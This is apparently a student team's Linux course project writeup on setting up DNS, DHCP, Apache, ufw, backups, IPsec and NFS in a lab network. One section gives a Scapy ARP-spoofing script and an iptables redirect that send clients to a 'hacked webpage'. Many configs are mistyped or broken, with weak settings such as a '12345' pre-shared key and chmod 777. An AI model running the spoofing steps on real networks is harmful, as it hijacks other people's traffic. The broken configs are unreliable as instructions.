User:Tejaswinieswar

Project Objective
The main objective of the Linux project is to build a network implementation for a start-up company. The main components to be implemented in a network are DNS server to resolve the IP addresses, a DHCP server for assigning the IP addresses for the clients and the other components in the network, a domain that is hosted by the webserver, a firewall and a backup server.

Team Members
•	Durga Hari Krishna Yadav Dokkara (dokkara.d@husky.neu.edu)

•	Sri Harshitha Konda (konda.s@husky.neu.edu)

•	Tejaswini Eswar (eswar.t@husky.neu.edu)

•	Yeshwanth Kottu (kottu.y@husky.neu.edu)

Domain Name System
DNS server resolves the hostnames or the given domain names to their respective IP addresses. It is an application level protocol that stores the DNS records for domain name, address records, name server records and mail exchange records. DNS maintains the domain name hierarchy and provides translation between it and the address spaces whereas DNS server stores the DNS records for a domain and responds with the answers to queries against its database. DNS protocol can use either with TCP or UDP using port number 53.

Dynamic Host Configuration Protocol
Dynamic Host Configuration Protocol operates based on the client-server model. IP addresses are automatically assigned by the DHCP server to the clients in the network which reduces the load on the network administrator or the user to configure these settings manually on thousands of computers. The DHCP server manages the pool of IP addresses and information about the client configuration parameters such as default gateway, domain name and name servers. DHCP uses UDP over the port number 67 and 68. DHCP server may have three methods of allocating IP addresses depending on the implementation.

•Dynamic allocation: This process uses a lease concept with a controllable time period where a network administrator reserves a range of IP addresses and each DHCP client on the LAN is configured to request an IP address from the DHCP server during network initialization. Here the DHCP server can reclaim the IP addresses that are not renewed.

•Automatic allocation: This is similar to the dynamic allocation, but the DHCP server keeps a table of past IP address assignments, so that it can assign the same IP address the client previously had. The DHCP server permanently assigns an IP address to a requesting client from the range defined by the administrator.

•Manual Allocation: This is also known as static allocation. The DHCP server is disabled and the administrator allocates a private IP address based on a preconfigured mapping to each client MAC address.

Webserver
The main function of a webserver is to deliver the webpages based on the client request. It is a program that uses HTTP (Hypertext Transfer Protocol) to establish the communication between the client and the server. The most popular webservers used at present times are Windows server, Apache webserver and Nginx webservers. In this project, Apache webserver is used, as it is an open source software and is compatible with almost all types of OS.

Firewall
Firewall is network security system that contains the set of predetermined security rules which monitors and controls the incoming and outgoing network traffic. Firewalls are generally categorized into network-based or host-based. Network-based firewalls are generally present on the network between internet and intranet. Host-based firewalls are positioned on the network node itself. Based on our requirement and security, our firewall can be configured in such a way that we can block certain packets.

Backup
It is responsible for restoring files, folders, databases in cases of server failure. In case of the server failure, all the files are routed to the backup server.

Algorithm
•	The client and the other servers in the network get their respective IP addresses from the DHCP address pool

•	The client enters the domain name of ‘inhouse.com’ in the web browser

•	A DNS query is sent out to the DNS server looking for the respective IP of inhouse.com

•	If the domain name is valid, the DNS server responds with an answer to the query giving out the IP address

•	If the IP address is not found at the DNS server, an error will be displayed saying the ‘server not found’

•	After getting the IP address, a HTTP request is sent to the webserver

•	If the request is successful, the web browser displays the web page that is hosted on the web server

Algorithm
•	When the DNS query is made, the client computer first searches for the local DNS cache which stores the resolved IP address in the past.

•	The local DNS server forwards the request to the root DNS server which responds back with the list of TLD (Top Level Domain) servers.

•	The request is forwarded to one of the TLD servers.

•	The TLD server reverts back with the authoritative DNS server name.

•	The local DNs server sends the request to the Authoritative DNS server which responds back with the IP address of the hostname.

DNS Server Configuration
Step 1: Update the packages list and install bind9 server by using apt-get

Command:

sudo apt-get update

sudo apt-get install bind9

Step 2: The file named.conf.options should be configured

Command:

sudo nano /etc/bind/named.conf.options

If the reply for the query is not available in the local DNS server, then the query will be forwarded to the forwarders (DNS servers) as configured below

forwarders {

195.5.5.1;

8.8.8.8;

8.8.4.4;

};

Step 3: open the file /etc/bind/name.local.conf and add the following contents in the file

Command:

sudo nano /etc/bind/name.local.conf

//

// Do any local configuration here

//

// Consider adding the 1918 zones here, if they are not used in your

// organization

//include "/etc/bind/zones.rfc1918";

#Forward zone

zone "inhouse.com" {

type master;

#masters{195.5.5.12};

allow-transfer{195.5.5.13 ;};

file "/etc/bind/zones/db.inhouse.com";

};

#Reverse zone

zone "5.5.195.in-addr.arpa" {

type master;

#masters{195.5.5.12};

file "/etc/bind/zones/db.195";

allow-transfer{195.5.5.13 ;};

};

#Reverse zone

zone "0.0.0.0.0.0.0.0.0.0.0.0.1.0.0.2.ip6.arpa" {

type master;

#masters{195.5.5.12};

file "/etc/bind/zones/db.195";

allow-transfer{195.5.5.13 ;};

};

Step 4: create zone files

Command:

sudo nano /etc/bind/zones/db.inhouse.com

;

; BIND data file for local loopback interface

;

$TTL	604800

@	IN	AAAA	2001::7

@	IN	NS	ns.inhouse.com.

@	IN	SOA	inhouse.com. admin.inhouse.com.

2	; Serial

604800		; Refresh 86400		; Retry 2419200		; Expire 604800 )	; Negative Cache TTL                                                        ;

IN	NS	ns.inhouse.com. IN	NS	ns1.inhouse.com. ns.inhouse.com. IN	A	195.5.5.12

ns1.inhouse.com. IN	A	195.5.5.13

lmsq.inhouse.com. IN	A	195.5.5.14

;

macbook	IN	CNAME	lmsq.inhouse.com.

www	IN	A	195.5.5.14

www	IN	AAAA	2001::7

sudo nano /etc/bind/zones/db.195

;

; BIND reverse data file for local loopback interface

;

$TTL	604800

@	IN	SOA	inhouse.com. admin.inhouse.com. (

2		; Serial 604800		; Refresh 86400		; Retry 2419200		; Expire 604800 )	; Negative Cache TTL                                                    ;

@	IN	NS	inhouse.com.

13	IN	PTR	ns1.inhouse.com.

12	IN	PTR	ns.inhouse.com.

14	IN	PTR	www.inhouse.com.

@	IN	NS	ns.inhouse.com.

7.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0	IN	PTR	www.inhouse.com.

Step 5: To restart the DNS master:

Command:

sudo /etc/init.d/ bind9 restart

DNS Slave Configuration: Step 1: Command:

sudo nano /etc/bind/name.local.conf

Algorithm
•	When a client is connected to a network, it broadcasts a DHCP discover message within its subnet.

•	The DHCP server after receiving this message responds back with a Unicast offer message to the server.

•	The client accepts the offer message and requests the DHCP server for an IP address.

•	The server responds back with the IP address

DHCPv4
Step 1: To update the available packages and install DHCP server

Command:

sudo apt-get update

sudo apt install isc-dhcp-server

Step 2: In order to configure the dhcp server edit the following files

Command:

/etc/dhcp/dhcpd.conf

In the file, make the following changes

subnet 195.5.5.0 netmask 255.255.255.0 {

range 195.5.5.21 195.5.5.254;

default-lease-time 600;

max-lease-time 7200;

option subnet-mask 255.255.255.0;

option broadcast-address 195.5.5.255;

option domain-name-servers 195.5.5.12, 195.5.5.13;

option routers 195.5.5.1;

}

DHCPv6
Step 1:

Command:

sudo nano /etc/dhcp/dhcpd6.conf

default-lease-time 600;

-lease-time 7200;

log-facility local7;

subnet6 2001::/64

range6 2001::21 2001::50;

}

Step 2:

Command:

sudo nano /etc/apparmor.d/-usr.sbin.dhcpd

add the following lines after network inet raw network inet6 raw

Step 3: now restart apparmor and make the following changes in the file

Command:

sudo /etc/inet.d/apparmor restart

sudo nano /etc/default/isc dhcp-server

add the following commands

OPTIONS= “-6”

Interfaces= ”ens33”

chmod 777 /etc/dhcp/dhcpd6.conf

Step 4: To restart the DHCP server:

Command:

sudo service isc-dhcp-server restart

sudo service isc-dhcp-server6 restart

Step 5: In order to check the status of DHCP server:

Command:

sudo system ctl status isc-dhcp-server

sudo system ctl status isc-dhcp-server6

Step 6: To check the system ctl logs:

Command:

Journalctl -xe

Step 7: Assign the static IP to the DHCP and make the following changes in the file:

Command:

sudo /etc/network/interfaces

auto lo

iface lo inet loopback

auto ens33

iface ens33 inet static

address 195.5.5.11

netmask 255.255.255.0

broadcast 195.5.5.255

gateway 195.5.5.1

network 195.5.5.0

dns-nameservers 195.5.5.12 195.5.5.13

iface ens33 inet6 static

address 2001::11

netmask 64

gateway 2001::1

DHCP Client Configuration
Step 1: Go to dhcp folder in /etc

Command:

sudo /etc/dhcp

add the following lines in the files

auto ens33

iface ens33 inet dhcp

Step 2: In order to fetch the IPv6 client doid, it can be found in

Command:

sudo /var/lib/dhcp/dhcpclient.leases

Step 3: To restart DHCP client

Command:

sudo /etc/init.d/ networking restart

Algorithm of Webserver
•	The client obtains server IP address from DNS server.

•	Client initiates TCP connection by sending SYN message on port 80 of the server.

•	Server responds with SYN-ACK message to the client and allows it to request the information.

•	Client responds back with the ACK message completing the three-way handshake.

•	Then the client requests for the desired HTML page

Webserver Configuration
Step 1: To install Apache2 server by using apt-ge

Command:

sudo apt-get update

sudo apt-get install apache2

If the IP address of 127.0.0.1 is entered in web browser, then the default apache2 page should be displayed. This shows that the apache2 web server is successfully installed.

Step 2: To allow the access of our hosted webpage by the other clients on the network the web pages has to be placed under /var/www/ so we create a directory for our domain inhouse.com under /var/www

Command:

sudo mkdir -p /var/www/inhouse.com/htmlfiles

Step 3: As the directories are not specified in root directories, we should grant the permission to other clients to access the files

Command:

sudo chown -R $USER:$USER /var/www/inhouse.com/htmlfiles

sudo chmod -R 755 /var/www

Step 4: create a html file of your website using nano or gedit

Command:

sudo nano /var/www/inhouse.com/htmlfiles/index.html

Step 5: Configuring Apache2-000-default.conf

Server Admin webserver@localhost

Server name inhouse.com

DocumentRoot /var/www/inhouse.com/htmlfiles

Step 6: Restart the webserver

Command:

sudo service apache2 restart

Step 7: Set up local host file

Command:

127.0.0.1 localhost

127.0.1.1 ubuntu

195.5.5.14 inhouse.com

Packages Used
•	ufw

Configuration
Step 1: install ufw by using the following command

Command:

sudo apt-get install ufw

Step 2: To allow or deny the access based on the requirement

Command:

Deny access to POP 3 from any sudo ufw deny 110

Allow telnet and ssh access from the server sudo ufw allow proto tcp from 195.5.5.14 to any port 22 sudo ufw allow proto tcp from 195.5.5.14 to any port 23

Deny access of ssh and telnet to 195.5.5.14 sudo ufw deny proto tcp from any to 195.5.5.14 port 22 sudo ufw deny proto tcp from any to 195.5.5.14 port 23

Deny access of FTP to 195.5.5.14 sudo ufw deny proto tcp from any to 195.5.5.14 port 21 sudo ufw deny proto tcp from any to 195.5.5.14 port 20

To allow NFS sudo ufw allow 111

To allow DHCP ports in the firewall sudo ufw allow 68 sudo ufw allow 67

To enable the firewall sudo ufw enable

To check the status of the firewall sudo ufw status

To test the status of the firewall sudo ufw status verbose

Backup
The desired documents are tarred and the file is created in backup server using SSH in the backup server

Configuration Steps for Backup Client:
Step 1: Install SSH server

Command:

sudo apt install open shh -server

Step 2: To give root access to the folder

Command:

chmod -R /opt

chmod -R775 /opt

Configuration Steps for Backup Server:
SSH client is installed by default in all the clients Step 1: To write shell script

Command:

nano /opt/backup.sh

day=$(date +%s)

file="Inhouse.com-$day.tgz"

tar zvcf - -C /var/www/inhouse.com | ssh harshi@195.5.5.15 "cat - > /opt/$file"

Step 2: for performing the ssh process without password, a ssh key has to be generated. To generate shh key:

Command:

ssh keygen

Step 3: To exchange the key with the backup server:

Command:

ssh-copy-id harshi@195.5.5.15

Enter the password for the user name harshi in 195.5.5.15

Step 4: In order to automate the backup, chronjob should be setup

Command:

chrontab -e

Step 5: Add the following line in the chrontab to specify the time for which the backup should happen. In our project, the configuartion is made in such a way that the backup happens for every 30 minutes

Command:

*/30 **** bash /opt/backup.sh

In the same way backup the DNS Master(/etc/bind) and the DHCP Server(/etc/dhcp) configurations to the backup server

ARP Spoofing
Arp spoofing is a technique in which an attacker sends ARP messages onto a Local Area Network. Here the attacker associates his MAC address with the IP address of the other client. This results in the forwarding of traffic to the other host which is meant to be sent to attacker IP address. Scapy is a powerful interactive packet manipulation program in python. It is used to forge the packets. In our case, to perform ARP poisoning we force the ARP packet and send to the client and forge the ARP table.

Step 1: Insatll the python module Scapy

Command:

pip install scapy

Step 2: create a python script and add the following content

Command:

sudo nano /opt/arpspoofing.py

from scapy.all import *

p=ARP;

p.psrc="195.5.5.14";

p.pdst="195.5.5.25";

while 1:

send(p,verbose=0)

Step 3: Execute the python script using the following

Command:

python arpspoofing.py

This script spoofs the mac address of the webserver in the client’s machine

Now we can see the mac address of the malicious client is updated on the client ARP table for the webserver when the client request for the 195.5.5.14 through the web browser, the packet reaches the malicious client as the ARP table of client has the malicious client’s mac address. But when the packet reaches layer 3, it gets dropped because the destination IP in the packet is destined to webserver IP. So in order to take the packet to the malicious client webserver the destination IP of the packet has to be forged

Command: arp -a

In order to change the IP we use destination mac with net filter at prerouting.

Command: iptables -t nat -A PREROUTING -p tcp -d 10.10.20.99 --dport 80 -j DNAT --to-destination 10.10.14.2

In the client, enter the domain inhouse.com and it will be redirected to the malicious client websever and you will see a hacked webpage

IP Sec
IP sec tunnel creates virtual private network between 2 Linux machines. It uses the protocol IP sec. Here the data security is provided in various ways such as authenticating and encryption of data, protection against manipulation. IP sec uses RSA for internet key exchange.

Step 1: Install strong swan starter

Command:

sudo apt-get install strongswan-starter

Create a file /etc/ipsec.conf and make the following changes sudo nano /etc/ipsec.conf

conn VM1_VM2

authby=secret

auto=route

keyexchange=ike

left=195.5.5.12

right=195.5.5.13

type=tunnel

esp=aes128gcm16!

Step 2: Create a file /etc/ipsec.secrets

Command:

sudo nano /etc/ipsec.secrets

195.5.5.13 195.5.5.12 : PSK "12345" Step 3: Similarly configure these steps in other client

Step 4: Restart ipsec on both the clients and test the status using following command

Command:

sudo ipsec restart

sudo ipsec status

Step 5: Testing:

Command:

sudo watch ipsec statusall

NFS
Installing NFS server: Step 1: Installing NFS server

Command:

apt get install nfs-kernal-server

Step 2: Edit the file nano/etc/exports and add the following lines

Command:

/opt

195.5.5.0/255.255.255.0(rw,sync,subtree_check,root_squash)

Step 3: Restart the NFS server:

Command:

/etc/init.d/nfs-kernel-server restart

Step 4: To check the exported folder.

Command:

exportfs -rv

NFS client:

apt install nfs-common

cd mod -R 777 /opt/mnt

nano /etc/fstab

add the following line

mount -a (in order to mount the folders of nfs server in the client)

Future Improvements
•	IPv6 tunnels can be implemented

•	We can implement proxy servers in the webserver to implement security where a particular group of clients can access

•	DNS security can be implemented and prevent DDOS

Conclusion
A network containing DNS server, DHCP server and webserver is created such that the client can access the webpage. The network is secured by the firewall and the redundancy is added by configuring Backup server.